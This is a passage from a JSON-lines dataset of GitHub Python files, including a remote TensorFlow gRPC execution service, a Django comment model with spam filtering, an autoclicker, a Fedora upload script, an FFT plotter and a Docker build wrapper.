Window()\r\nwindow.show()\r\nsys.exit(app.exec())\r\n\r\n\r\n\r\n","repo_name":"NamigRustamov/PragmaticFoundationProject","sub_path":"secwindow.py","file_name":"secwindow.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26323754374","text":"import io\nimport queue\nfrom collections import deque\nimport threading\nimport sys\nfrom typing import Iterator\nimport re\nimport contextlib\nimport tensorflow as tf\nfrom .proto import rtf_pb2, rtf_pb2_grpc\n\n\ndef rreplace(s, old, new, occurrence):\n li = s.rsplit(old, occurrence)\n return new.join(li)\n\n\nclass Builder:\n\n HEADER = (\n \"import tensorflow as tf\\n\"\n \"import sys\\n\\n\"\n # \"@tf.function\\n\"\n \"def f():\\n\"\n )\n FOOTER = \"\\nf()\\n\"\n\n def __init__(self):\n self._statements = []\n self._indent_re = re.compile(r\"^(\\s*)\")\n\n def _flush_stdout(self, stmt):\n # TODO: convert stmt to AST or other structure.\n # Understand if print is a function call or not\n # and if it is a call, then add the flush()\n # The current solution is unsafe.\n if \"tf.print(\" in stmt and not \"output_stream\" in stmt:\n stmt = rreplace(stmt, \")\", \", output_stream=sys.stdout)\", -1)\n if \"print(\" in stmt:\n indent = self._indent_re.search(stmt)[0]\n stmt += f\"\\n{indent}sys.stdout.flush()\"\n\n return stmt\n\n def build(self, stmt):\n # TODO: check stmt correctness using its AST or other structure.\n stmt = self._flush_stdout(stmt)\n self._statements.append(stmt)\n\n def __call__(self):\n source = Builder.HEADER\n for stmt in self._statements:\n source += f\" {stmt}\\n\"\n source += Builder.FOOTER\n f = compile(source, \"useless\", \"exec\")\n return eval(f)\n\n\nclass DoubleIO(io.StringIO):\n def __init__(self, initial_value=\"\", newline=\"\\n\"):\n super().__init__(initial_value, newline)\n self._lines = deque()\n self._buffer = []\n\n def flush(self):\n self._lines.append(\"\".join(self._buffer))\n self._buffer.clear()\n\n def write(self, s):\n 
self._buffer.append(s)\n\n    def close(self):\n        super().close()\n\n    def readline(self):\n        return self._lines.popleft()\n\n\nclass RTFServicer(rtf_pb2_grpc.RTFServicer):\n    \"\"\"Remote TensorFlow (RTF) gRPC service provider.\"\"\"\n\n    def DefineAndCall(self, request_iterator, context) -> Iterator[rtf_pb2.RTFResponse]:\n        builder = Builder()\n        for statement in request_iterator:\n            builder.build(statement.stmt)\n\n        fp = DoubleIO()\n        stop = False\n        response_q = queue.Queue()\n\n        def executor():\n            # without `nonlocal`, `stop = True` below would only rebind a\n            # local name and the generator loop would never terminate\n            nonlocal stop\n            with contextlib.redirect_stdout(fp):\n                output_value = builder()\n            fp.close()\n\n            response = rtf_pb2.RTFResponse()\n            if output_value:\n                response.body = bytes(output_value)\n            response.status = True\n            response_q.put(response)\n            stop = True\n\n        def stdout_sender():\n            while not fp.closed:\n                try:\n                    line = fp.readline()\n                    response = rtf_pb2.RTFResponse()\n                    response.stdout = line\n                    response.status = True\n                    response_q.put(response)\n                except IndexError:\n                    pass\n\n        threads = [\n            threading.Thread(target=stdout_sender),\n            threading.Thread(target=executor),\n        ]\n        for thread in threads:\n            thread.start()\n\n        while True:\n            if stop:\n                while not response_q.empty():\n                    yield response_q.get()\n                break\n            yield response_q.get()\n","repo_name":"galeone/rtf","sub_path":"rtf/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"34"} +{"seq_id":"15482077860","text":"import json\nfrom shared.games_manager import GamesManager\nfrom request_response import *\n\n## NOT WORKING: \"'PlayerEvents' object has no attribute 'query_events_for_player'\"\n\ndef lambda_handler(event, context):\n    req = RequestRespond(event)\n    games_manager = GamesManager()\n    game_id = req.params['game_id']\n    player_id = req.params['player_id']\n\n    if not (\n        games_manager.game_exists(game_id)\n        and games_manager.player_exists(game_id, player_id)\n    ):\n        return NOT_ACCEPTABLE\n\n    if req.method == \"GET\":\n        return (\n            req.make_response({\"events\": games_manager.get_player_events(game_id, player_id)})\n        )\n    else:\n        return METHOD_NOT_ALLOWED\n","repo_name":"JonathanFoo0523/extreme_startup_scaled","sub_path":"lambda-api-endpoint/player_events/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"41772929960","text":"import time\r\nimport threading\r\nfrom pynput.mouse import Controller, Button\r\nfrom pynput.keyboard import Listener, KeyCode\r\n\r\n#key to toggle the autoclicker on/off.\r\nTOGGLE_KEY = KeyCode(char=\"p\")\r\n\r\n#initial state of the flag (False: the autoclicker is off)\r\nclicking = False\r\nmouse = Controller()\r\n\r\n#click continuously while the flag is set\r\ndef clicker():\r\n    while True:\r\n        if clicking:\r\n            mouse.click(Button.left, 1)\r\n            time.sleep(0.0001)\r\n\r\n#flip the flag on each press of the toggle key\r\ndef toggle_event(key):\r\n    if key == TOGGLE_KEY:\r\n        global clicking\r\n        clicking = not clicking\r\n\r\nclick_thread = threading.Thread(target=clicker)\r\nclick_thread.start()\r\n\r\nwith Listener(on_press=toggle_event) as listener:\r\n    listener.join()","repo_name":"LucianBell/Autoclick.py","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18722007927","text":"import datetime\nimport md5\n\nfrom django.db import models\nfrom django.conf import settings\nfrom 
django.db.models import permalink\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes import generic\nfrom django.contrib.auth.models import User\n\nfrom savoy.core.people.models import Person\nfrom savoy.core.media.models import FlickrUser\nfrom savoy.contrib.comments.managers import *\n\nclass NameBlacklistItem(models.Model):\n \"\"\"\n The name blacklist is a list of author names to reject comments from.\n \"\"\"\n name = models.CharField(max_length=250)\n reason = models.TextField(blank=True)\n\n def __unicode__(self):\n return self.name\n\n\nclass EmailBlacklistItem(models.Model):\n \"\"\"\n The email blacklist is a list of author email addresses to reject comments from.\n \"\"\"\n email_address = models.EmailField()\n reason = models.TextField(blank=True)\n\n def __unicode__(self):\n return self.email_address\n\n\nclass IPBlacklistItem(models.Model):\n \"\"\"\n The name blacklist is a list of author names to reject comments from.\n \"\"\"\n ip_address = models.IPAddressField()\n reason = models.TextField(blank=True)\n\n def __unicode__(self):\n return self.ip_address\n\n\nclass URLBlacklistItem(models.Model):\n \"\"\"\n The name blacklist is a list of author names to reject comments from.\n \"\"\"\n url = models.URLField()\n reason = models.TextField(blank=True)\n\n def __unicode__(self):\n return self.url\n\n\nclass EmailWhitelistItem(models.Model):\n \"\"\"\n The email whitelist is a list of author email addresses to blindly accept comments from.\n \"\"\"\n email_address = models.EmailField()\n reason = models.TextField(blank=True)\n\n def __unicode__(self):\n return self.email_address\n\n\nclass Comment(models.Model):\n content_type = models.ForeignKey(ContentType)\n object_id = models.IntegerField()\n content_object = generic.GenericForeignKey()\n person = models.ForeignKey(Person, blank=True, null=True)\n author_name = models.CharField(max_length=150)\n author_email_address = models.EmailField(max_length=250)\n author_email_address_hash = models.CharField(max_length=250, blank=True, null=True)\n author_url = models.URLField(blank=True, null=True)\n author_ip_address = models.IPAddressField()\n author_user_agent_string = models.CharField(max_length=250, blank=True)\n title = models.CharField(blank=True, max_length=250)\n body = models.TextField()\n featured = models.BooleanField(default=False)\n trollish = models.BooleanField(default=False)\n approved = models.BooleanField(default=False)\n whitelisted = models.BooleanField(default=False)\n blacklisted = models.BooleanField(default=False)\n failed_akismet = models.BooleanField(default=False)\n completed_spam_check = models.BooleanField(default=False)\n date_submitted = models.DateTimeField(default=datetime.datetime.now)\n objects = models.Manager()\n approved_comments = ApprovedCommentManager()\n orphaned_comments = OrphanedCommentManager()\n featured_comments = FeaturedCommentManager()\n exclude_flickr_favorites = NonFlickrFavoriteApprovedCommentManager()\n \n def __unicode__(self):\n return \"%s: %s...\" % (self.author_name, self.body[:50])\n \n def is_flickr_comment(self):\n \"\"\" Returns True if this comment was imported from Flickr. \"\"\"\n if FlickrComment.objects.get(comment=self):\n return True\n else:\n return False\n\n def source(self):\n \"\"\" Returns a string representation of the source for this comment (i.e. 'flickr' or 'local'). 
\"\"\"\n if self.is_flickr_comment():\n return \"flickr\"\n else:\n return \"local\"\n\n @permalink\n def get_absolute_url(self):\n \"\"\"\n Returns the absolute URL to the comment: the URL of the object it's attached to, plus and anchor.\n \"\"\"\n try:\n return '%s#c%s' % (self.parent_object().get_absolute_url(), self.id)\n except AttributeError:\n return \"\"\n \n def parent_object(self):\n \"\"\"\n Returns the object that this is a comment on. If that item is another comment\n (in the case of threaded comments), keeps going up the chain until it find a \n parent object that is another ContentType.\n \"\"\"\n from django.core.exceptions import ObjectDoesNotExist\n try:\n if self.content_type == ContentType.objects.get_for_model(Comment):\n return self.content_object.parent_object()\n else:\n return self.content_type.get_object_for_this_type(pk=self.object_id)\n except ObjectDoesNotExist:\n return None\n\n def _akismet_spam_check(self):\n \"\"\"\n Checks the comment against the Akismet spam prevention web service. Returns \"spam\" if the\n comment is found to be spam, \"ham\" if the comment isn't found to be spam, and \"error\" if\n the check doesn't complete successfully.\n \"\"\"\n from akismet import Akismet, AkismetError\n import unicodedata\n akismet = Akismet(key=settings.AKISMET_API_KEY, blog_url=settings.AKISMET_SITE_URL, agent=settings.AKISMET_USER_AGENT)\n comment_data = {\n 'user_ip': self.author_ip_address,\n 'user_agent': self.author_user_agent_string,\n 'comment_author': unicodedata.normalize('NFKD', self.author_name).encode('ascii','ignore'),\n 'comment_author_email': self.author_email_address,\n 'comment_author_url': self.author_url,\n }\n try:\n # Pass the comment through Akisment and find out if it thinks it's spam.\n is_spam = akismet.comment_check(comment=unicodedata.normalize('NFKD', unicode(self.body)).encode('ascii','ignore'), data=comment_data)\n if is_spam == True:\n return \"spam\"\n elif is_spam == False:\n return \"ham\"\n except AkismetError:\n pass\n return \"error\"\n \n def _is_whitelisted(self):\n \"\"\"\n Returns True is the comment matches our whitelist.\n \"\"\"\n try:\n item = EmailWhitelistItem.objects.get(email_address=self.author_email_address)\n return True\n except:\n return False\n \n def _is_blacklisted(self):\n \"\"\"\n Returns True is the comment matches one of our blacklists.\n \"\"\"\n blacklisted = False\n if NameBlacklistItem.objects.all().count() != 0:\n for item in NameBlacklistItem.objects.all():\n if item.name in self.author_name:\n return True\n if EmailBlacklistItem.objects.all().count() != 0:\n for item in EmailBlacklistItem.objects.all():\n if item.email_address in self.author_email_address:\n return True\n if URLBlacklistItem.objects.all().count() != 0:\n for item in URLBlacklistItem.objects.all():\n if item.url in self.author_url:\n return True\n if IPBlacklistItem.objects.all().count() != 0:\n for item in IPBlacklistItem.objects.all():\n if item.ip_address in self.author_ip_address:\n return True\n return blacklisted\n \n def _spam_check(self):\n \"\"\"\n Checks the comment for spam and other undesirables.\n \"\"\"\n # Set all the possible flags to False upfront.\n delete_me = is_spam = whitelisted = blacklisted = akismet_error = approved = False\n \n # Next, see if Akismet will sign off on the comment.\n akismet_result = self._akismet_spam_check()\n if akismet_result == \"spam\":\n # If Akismet reports the comment is spam, mark it for deletion.\n is_spam = True\n delete_me = True\n elif akismet_result == \"ham\":\n # If it's 
ham, approve it.\n            approved = True\n        elif akismet_result == \"error\":\n            # If there was some error in the Akismet-checking process, unapprove the comment\n            # and flag it for notification later.\n            akismet_error = True\n\n        # If we fail local spam checks, unapprove and delete the comment.\n        if self._is_blacklisted() == True:\n            approved = False\n            delete_me = True\n            blacklisted = True\n\n        # If the e-mail is in our whitelist, approve and save the message, even despite any other\n        # checks which may have raised flags.\n        if self._is_whitelisted():\n            approved = True\n            whitelisted = True\n            blacklisted = False\n            delete_me = False\n            is_spam = False\n\n        results = {\n            'delete': delete_me,\n            'blacklisted': blacklisted,\n            'whitelisted': whitelisted,\n            'approved': approved,\n            'akismet_spam': is_spam,\n            'akismet_error': akismet_error,\n        }\n\n        return results\n\n    def save(self, force_insert=False, force_update=False):\n        # Figure out which content item (blog post, link, etc.) we're dealing with.\n        content_object = self.content_object\n\n        if self.completed_spam_check:\n            # If completed_spam_check is True, then this is an old comment and we're probably editing in the admin.\n            # Therefore, changes are authoritative, and we don't need to go through all the comment spam measures.\n            super(Comment, self).save()\n        else:\n            # If completed_spam_check is False, we need to run akismet and test against our blacklists.\n            # We only do this once.\n            spam_check = self._spam_check()\n            self.completed_spam_check = True\n\n            # If the message isn't marked for deletion, save the comment\n            if not spam_check['delete']:\n                self.approved = spam_check['approved']\n                self.whitelisted = spam_check['whitelisted']\n                self.blacklisted = spam_check['blacklisted']\n                self.failed_akismet = spam_check['akismet_spam']\n                self.author_email_address_hash = md5.new(self.author_email_address).hexdigest()\n                super(Comment, self).save(force_insert=force_insert, force_update=force_update)\n            else:\n                # If the message is marked for deletion, don't save it.\n                return\n\n    class Meta:\n        ordering = ('-date_submitted',)\n        get_latest_by = 'date_submitted'\n\n\nclass FlickrComment(models.Model):\n    \"\"\"A FlickrComment keeps comments left on Flickr. 
It hangs off the Comment model, storing Flickr-specific metadata.\"\"\"\n    comment = models.ForeignKey(Comment)\n    flickr_comment_id = models.CharField(blank=True, max_length=200)\n    author = models.ForeignKey(FlickrUser)\n    url = models.URLField(blank=True, verify_exists=True)\n\n    def __str__(self):\n        return \"FlickrComment\"\n","repo_name":"ipmb/97bottles","sub_path":"libs/savoy/contrib/comments/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72643876576","text":"# coding: utf-8\n\nfrom django import forms\nfrom django.utils.encoding import force_str\nfrom django.utils.translation import gettext_lazy as _\n\nM = _('Hold down \"Control\", or \"Command\" on a Mac, to select more than one.')\n\n\nclass FixedModelForm(forms.ModelForm):\n    \"\"\"\n    Simple child of ModelForm that removes the 'Hold down \"Control\" ...'\n    message that is enforced in select multiple fields.\n\n    See https://github.com/asyncee/django-easy-select2/issues/2\n    and https://code.djangoproject.com/ticket/9321\n    \"\"\"\n\n    def __init__(self, *args, **kwargs):\n        super(FixedModelForm, self).__init__(*args, **kwargs)\n\n        msg = force_str(M)\n\n        for name, field in self.fields.items():\n            field.help_text = field.help_text.replace(msg, '')\n","repo_name":"asyncee/django-easy-select2","sub_path":"easy_select2/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":212,"dataset":"github-code","pt":"34"} +{"seq_id":"42317442541","text":"from src.Resident import Resident\n\n\nclass Apartment:\n\n    def __init__(self):\n        self.residents = []\n        self.floor = 0\n        self.door = 0\n        self.type = \"\"\n\n    def insertApartment(self):\n        # if there are no residents yet, ask for at least one;\n        # if there already are some, ask whether to add more:\n        if len(self.residents) == 0:\n            # create a fresh Resident each time; reusing one shared module-level\n            # instance would append the same object repeatedly\n            new_resident = Resident()\n            new_resident.insertResident()\n            self.residents.append(new_resident)\n        self.askMoreResidents()\n        self.introInformationInApartment(\"floor\")\n        self.introInformationInApartment(\"door\")\n        self.introInformationInApartment(\"type\")\n\n    def introInformationInApartment(self, word):\n        print(word)\n        setattr(self, word, input())\n\n    def askMoreResidents(self):\n\n        try:\n            while True:\n                user_selection = int(\n                    input(\"Press 1 to add another resident or 0 to finish:\"))\n                if user_selection == 1:\n                    new_resident = Resident()\n                    new_resident.insertResident()\n                    self.residents.append(new_resident)\n                if user_selection == 0:\n                    break\n        except ValueError:\n            print(\"Please enter only numbers!\")\n\n\n    def showInfoApartment(self):\n        for resident in self.residents:\n            resident.showInfoResident()\n        print(f\"floor: {self.floor} , door: {self.door} , type: {self.type}\")","repo_name":"saidaHF/BuildingManagement","sub_path":"src/Apartment.py","file_name":"Apartment.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13839286788","text":"from ..extensions import db\n\n# Usuario\n# table that holds the user's profile data\n# id => primary key\n# nome => the user's full name\n# cpf => the user's CPF (Brazilian taxpayer ID)\n# email => the user's email address\n# telefone => the user's home or mobile phone number\n# endereço => the user's full address: street, number, complement, etc.\n\nclass Usuario(db.Model):\n    __tablename__ = 'usuario'\n    id = db.Column(db.Integer, primary_key = True)\n    
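Condensed, the moderation precedence in `Comment._spam_check` above is: a whitelist hit wins outright, a blacklist hit or an Akismet "spam" verdict marks the comment for deletion, "ham" approves it, and an Akismet error keeps the comment but leaves it unapproved. A small sketch of that decision table (hypothetical helper, not part of the savoy API):

```python
def moderate(akismet_result, blacklisted, whitelisted):
    # Whitelist overrides every other signal, as in Comment._spam_check.
    if whitelisted:
        return {"approved": True, "delete": False}
    if blacklisted or akismet_result == "spam":
        return {"approved": False, "delete": True}
    # "ham" approves; an Akismet "error" keeps the comment, unapproved.
    return {"approved": akismet_result == "ham", "delete": False}

assert moderate("spam", True, True) == {"approved": True, "delete": False}
assert moderate("ham", True, False) == {"approved": False, "delete": True}
assert moderate("error", False, False) == {"approved": False, "delete": False}
```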
nome = db.Column(db.String(30), nullable = False)\n cpf = db.Column(db.Integer, unique = True, nullable = False)\n email = db.Column(db.String(50), unique = True, nullable = False)\n telefone = db.Column(db.Integer, nullable = False)\n endereço = db.Column(db.String(30), nullable = False)\n\n # carrinho(one) <-> usuario(one)\n carrinho = db.relationship(\"carrinho\", back_populates=\"usuario\", uselist=False)\n\n # pedidos(many) <-> usuario(one)\n pedido = db.relationship('Pedidos', backref = 'pedido_usuario')\n\n # cupons(many) <-> usuario(one)\n cupom = db.relationship('Cupons', backref = 'cupons_usuario')\n\n def json(self):\n return{\n 'nome':self.nome,\n 'cpf':self.cpf,\n 'email':self.email,\n 'telefone':self.telefone,\n 'endereço':self.endereço\n }\n\n","repo_name":"karenarcoverde/automoveis-fluxo","sub_path":"app/usuario/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35485633404","text":"'Boundary definitions for letters'\n\nfrom math import pi, tan\n\ny_lim, width = 5, 1\nleft_end, right_end = -3.5, 3.5\n\ndef get_xy(point):\n\n x, y = point\n assert isinstance(x, float) and isinstance(y, float)\n\n return x, y\n\ndef assert_A(point, slope=10/3):\n\n x, y = get_xy(point)\n\n inside_outer_left_arm = lambda x, y: y + y_lim <= slope * (x - left_end) \n inside_outer_right_arm = lambda x, y: y + y_lim <= -slope * (x - right_end) \n outside_inner_left_arm = lambda x, y: y + y_lim >= slope * (x - (left_end+width)) \n outside_inner_right_arm = lambda x, y: y + y_lim >= -slope * (x - (right_end-width)) \n\n return (-width <= y <= 0 or y_lim-width <= y <= y_lim) and (inside_outer_left_arm(x, y) and inside_outer_right_arm(x, y)) \\\n or (-y_lim <= y <= -width or 0 <= y <= y_lim-width) and (inside_outer_left_arm(x, y) and outside_inner_left_arm(x, y) or inside_outer_right_arm(x, y) and outside_inner_right_arm(x, y))\n\ndef assert_B(point):\n\n x, y = get_xy(point)\n\n curve_left_end = left_end + width\n outer_major_axis = right_end - curve_left_end\n outer_minor_axis = y_lim / 2\n inner_major_axis = outer_major_axis - width \n inner_minor_axis = outer_minor_axis - width\n\n inside_upper_outer_curve = lambda x, y: outer_minor_axis**2 * (x-curve_left_end)**2 + outer_major_axis**2 * (y-outer_minor_axis)**2 <= outer_minor_axis**2 * outer_major_axis**2 \n inside_lower_outer_curve = lambda x, y: outer_minor_axis**2 * (x-curve_left_end)**2 + outer_major_axis**2 * (y+outer_minor_axis)**2 <= outer_minor_axis**2 * outer_major_axis**2 \n outside_upper_inner_curve = lambda x, y: inner_minor_axis**2 * (x-curve_left_end)**2 + inner_major_axis**2 * (y-outer_minor_axis)**2 >= inner_minor_axis**2 * inner_major_axis**2 \n outside_lower_inner_curve = lambda x, y: inner_minor_axis**2 * (x-curve_left_end)**2 + inner_major_axis**2 * (y+outer_minor_axis)**2 >= inner_minor_axis**2 * inner_major_axis**2 \n\n return (-outer_minor_axis <= y-outer_minor_axis <= outer_minor_axis or -outer_minor_axis <= y+outer_minor_axis <= outer_minor_axis) and (left_end <= x <= left_end+width) or \\\n left_end+width <= x <= right_end and (inside_upper_outer_curve(x, y) and outside_upper_inner_curve(x, y) or inside_lower_outer_curve(x, y) and outside_lower_inner_curve(x, y))\n\ndef assert_C(point, center=1, theta=pi/3):\n\n x, y = get_xy(point)\n\n return (x-center)**2 + y**2 <= y_lim**2 \\\n and (x-center)**2 + y**2 >= (y_lim-1)**2 \\\n and (x <= 0 or abs(y/(x-center)) >= tan(theta))\n\ndef 
assert_D(point):\n\n x, y = get_xy(point)\n\n curve_left_end = left_end + width\n outer_major_axis = right_end - curve_left_end\n outer_minor_axis = y_lim\n inner_major_axis = outer_major_axis - width \n inner_minor_axis = outer_minor_axis - width\n\n inside_outer_curve = lambda x, y: outer_minor_axis**2 * (x-curve_left_end)**2 + outer_major_axis**2 * y**2 <= outer_minor_axis**2 * outer_major_axis**2 \n outside_inner_curve = lambda x, y: inner_minor_axis**2 * (x-curve_left_end)**2 + inner_major_axis**2 * y**2 >= inner_minor_axis**2 * inner_major_axis**2\n\n return (-outer_minor_axis <= y <= outer_major_axis) and (left_end <= x <= left_end+width or \\\n left_end+width <= x <= right_end and inside_outer_curve(x, y) and outside_inner_curve(x, y))\n\ndef assert_E(point):\n\n x, y = get_xy(point)\n\n ...\n\nassert_funcs = {\n 'A': assert_A,\n 'B': assert_B,\n 'C': assert_C,\n 'D': assert_D,\n # 'E': assert_E,\n # 'F': assert_F,\n # 'G': assert_G,\n # 'H': assert_H,\n # 'I': assert_I,\n # 'J': assert_J,\n # 'K': assert_K,\n # 'L': assert_L,\n # 'M': assert_M,\n # 'N': assert_N,\n # 'O': assert_O,\n # 'P': assert_P,\n # 'Q': assert_Q,\n # 'R': assert_R,\n # 'S': assert_S,\n # 'T': assert_T,\n # 'U': assert_U,\n # 'V': assert_V,\n # 'W': assert_W,\n # 'X': assert_X,\n # 'Y': assert_Y,\n # 'Z': assert_Z\n}\n\n\nif __name__ == '__main__':\n\n import argparse\n import sys\n import numpy as np\n import matplotlib.pyplot as plt\n\n parser = argparse.ArgumentParser(description=__doc__.strip().split('\\n')[0], add_help=False)\n parser.add_argument('letter', type=str)\n args = parser.parse_args()\n\n letter = args.letter.upper()\n assert_func = assert_funcs[letter]\n\n sample_size = 10_000\n sample = np.random.uniform(-y_lim, y_lim, (sample_size, 2)).tolist()\n sample = [point for point in sample if assert_func(point)]\n\n plt.scatter(*zip(*sample))\n plt.xlim(-y_lim, y_lim)\n plt.ylim(-y_lim, y_lim)\n plt.show()","repo_name":"ignasa007/Random","sub_path":"100-days-of-code/day6-day9_noise/assertions.py","file_name":"assertions.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32352428912","text":"#!/usr/bin/env python\n\n# Script for testing upload a file to Fedora to get an upload id for use as\n# a datastream location.\n# Example of using a callback method on the upload api call.\n# Requires progressbar\n\nimport argparse\nimport base64\nimport os\nimport progressbar\nimport pycurl\n\nfrom eulfedora.server import Repository\nfrom eulfedora.util import force_bytes, force_text\nfrom test import testsettings\n\n\ndef upload_file(filename):\n repo = Repository(testsettings.FEDORA_ROOT_NONSSL, testsettings.FEDORA_USER,\n testsettings.FEDORA_PASSWORD)\n\n filesize = os.path.getsize(filename)\n widgets = ['Upload: ', progressbar.widgets.Percentage(), ' ',\n progressbar.widgets.Bar(), ' ', progressbar.widgets.ETA(),\n ' ', progressbar.widgets.FileTransferSpeed()]\n # set initial progressbar size based on file; will be slightly larger because\n # of multipart boundary content\n pbar = progressbar.ProgressBar(widgets=widgets, maxval=filesize).start()\n\n def upload_callback(monitor):\n # update the progressbar to actual maxval (content + boundary)\n pbar.max_value = monitor.len\n # update current status\n pbar.update(monitor.bytes_read)\n\n with open(filename, 'rb') as f:\n upload_id = repo.api.upload(f, callback=upload_callback)\n pbar.finish()\n print(upload_id)\n\n\ndef curl_upload_file(filename):\n 
print('curl upload')\n conn = pycurl.Curl()\n auth = base64.b64encode(force_bytes(\"%s:%s\" % (testsettings.FEDORA_USER, testsettings.FEDORA_PASSWORD)))\n headers = {'Authorization' : 'Basic %s' % force_text(auth)}\n conn.setopt(conn.URL, '%supload' % testsettings.FEDORA_ROOT_NONSSL)\n conn.setopt(pycurl.VERBOSE, 1)\n conn.setopt(pycurl.HTTPHEADER, [\"%s: %s\" % t for t in headers.items()])\n\n filesize = os.path.getsize(filename)\n widgets = ['Upload: ', progressbar.widgets.Percentage(), ' ',\n progressbar.widgets.Bar(), ' ', progressbar.widgets.ETA(),\n ' ', progressbar.widgets.FileTransferSpeed()]\n # set initial progressbar size based on file; will be slightly larger because\n # of multipart boundary content\n pbar = progressbar.ProgressBar(widgets=widgets, maxval=filesize).start()\n\n def progress(dl_total, dl, up_total, up):\n # update the progressbar to actual maxval (content + boundary)\n pbar.max_value = up_total\n # update current status\n pbar.update(up)\n\n conn.setopt(conn.HTTPPOST, [\n ('file', (\n # upload the contents of this file\n conn.FORM_FILE, filename,\n # specify a different file name for the upload\n conn.FORM_FILENAME, 'file',\n # specify a different content type\n # conn.FORM_CONTENTTYPE, 'application/x-python',\n )),\n ])\n # conn.setopt(conn.CURLOPT_READFUNCTION)\n conn.setopt(conn.XFERINFOFUNCTION, progress)\n conn.setopt(conn.NOPROGRESS, False)\n\n conn.perform()\n\n # HTTP response code, e.g. 200.\n print('Status: %d' % conn.getinfo(conn.RESPONSE_CODE))\n # Elapsed time for the transfer.\n print('Time: %f' % conn.getinfo(conn.TOTAL_TIME))\n\n conn.close()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Upload a file to fedora for use as datastream content')\n parser.add_argument('filename', metavar='FILE',\n help='name of the file to upload')\n parser.add_argument('--curl', action='store_true',\n help='upload with pycurl')\n\n args = parser.parse_args()\n if args.curl:\n curl_upload_file(args.filename)\n else:\n upload_file(args.filename)","repo_name":"emory-libraries/eulfedora","sub_path":"scripts/upload-test.py","file_name":"upload-test.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"34"} +{"seq_id":"29561484063","text":"#!/usr/bin/python\nimport wave\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport peakutils\n\n#Need to get (x,y) coordinates of a DFFT from a wave sample. 
@matth3wology\n\n#Import wav file to matplot Frequency Domain\nm = wave.open(\"440.wav\",\"r\")\n\n#Convert wav to numpy matrix\nframes = m.readframes(-1)\nframes = np.frombuffer(frames, dtype=np.int16)\n\nchannels = [[] for channel in range(m.getnchannels())]\n\n#Checking the number of channels to take both Mono and Stereo\nfor a,b in enumerate(frames):\n    channels[a%len(channels)].append(b)\n\n#Setup (x,y)\nsignal = channels[0]\nN = len(signal)\nfft = np.fft.fft(signal)\ny = 2.0/N * np.abs(fft[:N//2])\nx = np.linspace(0.0,m.getframerate()/2.0,N//2)\n\n#Find peaks\npeaks = peakutils.indexes(y, thres=0.05, min_dist=10)\nx_peak=x[peaks]\ny_peak=y[peaks]\n\n#Plot\nplt.plot(x,y)\nplt.plot(x_peak,y_peak,'rd')\n\n#Show the plot\nplt.show()\n","repo_name":"matth3wology/audio_test","sub_path":"fft_plot_peaks.py","file_name":"fft_plot_peaks.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"35559164554","text":"import logging\nimport os\nimport re\nimport time\nfrom enum import Enum\nfrom typing import List, Tuple, Dict\n\nimport docker\nfrom docker import APIClient\nimport json\nfrom pythoncommons.file_utils import FileUtils\nfrom pythoncommons.process import SubprocessCommandRunner\nfrom pythoncommons.string_utils import auto_str\n\nDEFAULT_DOCKERFILE_NAME = \"Dockerfile\"\n\nLOG = logging.getLogger(__name__)\n\n\nclass DockerWrapper:\n    client = APIClient(base_url=\"unix://var/run/docker.sock\")\n\n    def __init__(self):\n        pass\n\n    @classmethod\n    def create_image_from_dir(cls, dockerfile_parent_dir_path, tag=None, build_args=None):\n        cls._build_image_internal(dockerfile_parent_dir_path, tag=tag, build_args=build_args)\n\n    @classmethod\n    def create_image_from_dockerfile(cls, dockerfile_name, tag=None, build_args=None):\n        dockerfile_parent_dir_path = os.path.dirname(dockerfile_name)\n\n        # Example: dockerfile_name = \"Dockerfile\" --> Path would be empty\n        if not dockerfile_parent_dir_path:\n            dockerfile_parent_dir_path = os.getcwd()\n            dockerfile_name = os.path.basename(dockerfile_name)\n        cls._build_image_internal(\n            dockerfile_parent_dir_path, dockerfile_name=dockerfile_name, tag=tag, build_args=build_args\n        )\n\n    @classmethod\n    def _build_image_internal(\n        cls, dockerfile_parent_dir_path, dockerfile_name=DEFAULT_DOCKERFILE_NAME, tag=None, build_args=None\n    ):\n        if not build_args:\n            build_args = {}\n        LOG.info(\n            \"Starting to build Docker image from Dockerfile: %s, based on parent dir path: %s\",\n            dockerfile_name,\n            dockerfile_parent_dir_path,\n        )\n        cls._fix_path_for_macos()\n        response = [\n            line\n            for line in cls.client.build(\n                path=dockerfile_parent_dir_path,\n                dockerfile=dockerfile_name,\n                rm=True,\n                tag=tag,\n                buildargs=build_args,\n                network_mode=\"host\",\n            )\n        ]\n        errors = cls.log_response(response)\n        if errors:\n            raise ValueError(\n                f\"Failed to build Docker image from Dockerfile: {dockerfile_name}. 
